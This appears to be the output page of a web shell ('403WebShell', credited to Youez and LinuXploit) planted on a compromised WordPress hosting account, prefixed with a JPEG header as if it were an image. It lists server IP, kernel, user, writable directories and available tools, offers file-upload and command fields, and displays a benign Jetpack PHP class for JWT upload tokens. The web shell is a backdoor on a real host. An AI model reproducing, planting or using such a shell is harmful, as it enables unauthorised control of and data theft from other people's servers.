????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.16.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/buyeaa.com/wp-content/plugins/jetpack/_inc/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/tempvsty/buyeaa.com/wp-content/plugins/jetpack/_inc/lib/class-unauth-file-upload-handler.php
<?php
/**
 * Unauthenticated File Upload Handler for Jetpack Forms.
 *
 * @package automattic/jetpack
 */

namespace Automattic\Jetpack;

use Automattic\Jetpack\Connection\Tokens;
use Automattic\Jetpack\Extensions\Premium_Content\JWT;
use Automattic\Jetpack\Status\Host;

/**
 * Handles temporary file uploads from unauthenticated users.
 */
class Unauth_File_Upload_Handler {
	/**
	 * Generate a JWT token for file upload authorization.
	 *
	 * @param array $claims The claims to include in the token.
	 * @return string The generated JWT token.
	 */
	public function generate_upload_token( $claims = array() ) {
		$default_claims = array(
			'exp' => time() + 3600, // 1 hour expiration
			'ip'  => isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '',
			'iat' => time(),
		);

		$claims = wp_parse_args( $claims, $default_claims );

		// Get the secret key for signing
		$secret = $this->get_upload_token_secret();

		// Generate and return the token
		return JWT::encode( $claims, $secret, 'HS256' );
	}

	/**
	 * Get the secret key for signing upload tokens.
	 *
	 * @return string|false The secret key or false if not available.
	 */
	private function get_upload_token_secret() {
		if ( ( new Host() )->is_wpcom_simple() ) {
			// phpcs:ignore ImportDetection.Imports.RequireImports.Symbol
			// TODO: This is a temporary solution to get the secret key for the upload token.
			return defined( 'EARN_JWT_SIGNING_KEY' ) ? EARN_JWT_SIGNING_KEY : false;
		}
		$token = ( new Tokens() )->get_access_token();
		if ( ! isset( $token->secret ) ) {
			return false;
		}
		return $token->secret;
	}

	/**
	 * Verify a JWT upload token.
	 *
	 * @param string $token The JWT token to verify.
	 * @return object|false The token claims if valid, false if invalid.
	 */
	public function verify_upload_token( $token ) {
		try {
			$secret = $this->get_upload_token_secret();
			return JWT::decode( $token, $secret, array( 'HS256' ) );
		} catch ( \Exception $e ) {
			return false;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit